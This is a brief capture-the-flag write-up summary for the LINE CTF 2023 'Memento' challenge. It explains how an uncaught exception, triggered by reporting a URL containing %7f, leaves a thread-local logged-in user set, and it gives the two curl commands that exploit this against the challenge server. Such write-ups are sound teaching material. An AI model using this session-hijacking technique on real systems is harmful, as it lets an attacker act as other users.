[https://blog.bawolff.net/2023/03/ctf-writeup-memento-from-linectf-2023.html](https://blog.bawolff.net/2023/03/ctf-writeup-memento-from-linectf-2023.html)

Tl;dr: Application stores current logged in user in a (thread local) variable whose life time persists beyond the http request. Normally it is cleared at the end of each request but if you trigger an exception it is not and you will continue to be logged in as that user in the next request even without their cookie. You can trigger an exception by reporting a url with %7f in it.

The solution looks like:

`curl 'http://176.17.0.1:10000/bin/report?urlString=http://176.17.0.1:10000/bin/report%253furlString=http://176.17.0.1:10000/bin/%257f'`

followed by

`curl 'http://34.84.65.148:31337/bin/list'`

Repeat steps multiple times as the server has multiple threads.

Please see [https://blog.bawolff.net/2023/03/ctf-writeup-memento-from-linectf-2023.html](https://blog.bawolff.net/2023/03/ctf-writeup-memento-from-linectf-2023.html) for full details.

Original writeup (https://blog.bawolff.net/2023/03/ctf-writeup-memento-from-linectf-2023.html).